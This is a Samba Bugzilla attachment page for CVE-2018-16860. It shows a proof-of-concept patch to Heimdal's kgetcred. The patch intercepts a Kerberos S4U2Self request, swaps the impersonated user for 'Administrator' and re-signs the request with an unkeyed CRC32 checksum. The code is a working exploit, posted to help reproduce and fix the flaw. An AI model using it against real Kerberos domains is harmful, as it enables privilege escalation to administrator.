The Samba-Bugzilla – Attachment 14669 Details for
Bug 13685
[SECURITY] CVE-2018-16860 S4U2Self with unkeyed checksum
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
[patch]
demonstrator
unkeyed_s4u2self.patch (text/plain), 3.72 KB, created by
Andrew Bartlett
on 2018-11-20 04:16:20 UTC
(
hide
)
Description:
demonstrator
Filename:
MIME Type:
Creator:
Andrew Bartlett
Created:
2018-11-20 04:16:20 UTC
Size:
3.72 KB
patch
obsolete
>From 9177b748bfba6408017a1a14fb06cc5202902c18 Mon Sep 17 00:00:00 2001 >From: Isaac Boukris <iboukris@gmail.com> >Date: Wed, 14 Nov 2018 03:15:22 +0200 >Subject: [PATCH] poc: unkeyed s4u2self checksum overwritten on wire > >Signed-off-by: Isaac Boukris <iboukris@gmail.com> >--- > source4/heimdal/kuser/kgetcred.c | 119 +++++++++++++++++++++++++++++++++++++++ > 1 file changed, 119 insertions(+) > >diff --git a/source4/heimdal/kuser/kgetcred.c b/source4/heimdal/kuser/kgetcred.c >index b95bc9d05e2..f92e1e5e3c2 100644 >--- a/source4/heimdal/kuser/kgetcred.c >+++ b/source4/heimdal/kuser/kgetcred.c >@@ -31,6 +31,10 @@ > * SUCH DAMAGE. > */ > >+#include <send_to_kdc_plugin.h> >+ >+#include "krb5_locl.h" >+ > #include "kuser_locl.h" > > static char *cache_str; >@@ -91,6 +95,116 @@ usage(int ret) > exit (ret); > } > >+static krb5_error_code >+plugin_init(krb5_context context, void **pctx) >+{ >+ *pctx = NULL; >+ return 0; >+} >+ >+static void >+plugin_fini(void *ctx) >+{ >+} >+ >+static krb5_error_code >+plugin_send_to_kdc(krb5_context context, >+ void *ctx, >+ krb5_krbhst_info *ho, >+ time_t timeout, >+ const krb5_data *in, >+ krb5_data *out) >+{ >+ return KRB5_PLUGIN_NO_HANDLE; >+} >+ >+static krb5_error_code >+my_plugin_send_to_realm(krb5_context context, >+ void *ctx, >+ krb5_const_realm realm, >+ time_t timeout, >+ const krb5_data *in, >+ krb5_data *out) >+{ >+ krb5_error_code ret; >+ KDC_REQ req; >+ const PA_DATA *sdata; >+ size_t used; >+ krb5_data mod_buf; >+ krb5_crypto crypto; >+ krb5_data data; >+ PA_S4U2Self self; >+ const char *str; >+ krb5_principal mod_princ; >+ int i = 0; >+ >+ static bool off = false; >+ >+ if(off) >+ return KRB5_PLUGIN_NO_HANDLE; >+ >+ ret = decode_TGS_REQ(in->data, in->length, &req, &used); >+ >+ if (ret) >+ return KRB5_PLUGIN_NO_HANDLE; >+ >+ sdata = krb5_find_padata(req.padata->val, req.padata->len, >+ KRB5_PADATA_FOR_USER, &i); >+ if (sdata == NULL) >+ return KRB5_PLUGIN_NO_HANDLE; >+ >+ ret = decode_PA_S4U2Self(sdata->padata_value.data, >+ sdata->padata_value.length, >+ &self, NULL); >+ if (ret) >+ return ret; >+ >+ ret = krb5_parse_name(context, "Administrator", &mod_princ); >+ if (ret) >+ return ret; >+ >+ self.name = mod_princ->name; >+ >+ ret = _krb5_s4u2self_to_checksumdata(context, &self, &data); >+ if (ret) >+ return ret; >+ >+ ret = krb5_create_checksum(context, >+ NULL, >+ KRB5_KU_OTHER_CKSUM, >+ CKSUMTYPE_CRC32, >+ data.data, >+ data.length, >+ &self.cksum); >+ >+ ASN1_MALLOC_ENCODE(PA_S4U2Self, req.padata->val[i].padata_value.data, >+ req.padata->val[i].padata_value.length, &self, &used, ret); >+ if (ret) >+ return ret; >+ >+ ASN1_MALLOC_ENCODE(TGS_REQ, mod_buf.data, mod_buf.length, &req, &used, ret); >+ if (ret) >+ return ret; >+ >+ off = true; >+ >+ ret = krb5_sendto_kdc(context, &mod_buf, &realm, out); >+ if (ret) >+ krb5_err(context, 1, ret, "krb5_sendto_kdc"); >+ >+ off = false; >+ >+ return 0; >+} >+ >+static krb5plugin_send_to_kdc_ftable my_plugin_ftable = { >+ KRB5_PLUGIN_SEND_TO_KDC_VERSION_2, >+ plugin_init, >+ plugin_fini, >+ plugin_send_to_kdc, >+ my_plugin_send_to_realm >+}; >+ > int > main(int argc, char **argv) > { >@@ -160,6 +274,11 @@ main(int argc, char **argv) > krb5_err(context, 1, ret, "krb5_parse_name %s", impersonate_str); > krb5_get_creds_opt_set_impersonate(context, opt, impersonate); > krb5_get_creds_opt_add_options(context, opt, KRB5_GC_NO_STORE); >+ >+ ret = krb5_plugin_register(context, PLUGIN_TYPE_DATA, KRB5_PLUGIN_SEND_TO_KDC, &my_plugin_ftable); >+ if (ret) >+ krb5_err(context, 1, ret, "krb5_plugin_register"); >+ > krb5_free_principal(context, impersonate); > } > >-- >2.14.4 >
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=14669">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 13685
: 14669 |
14810
|
14817
|
15094
|
15096
|
15097
|
15098
|
15100
|
15102
|
15103
|
15104
|
15106
|
15107
|
15108
|
15109
|
15110
|
15111
|
15112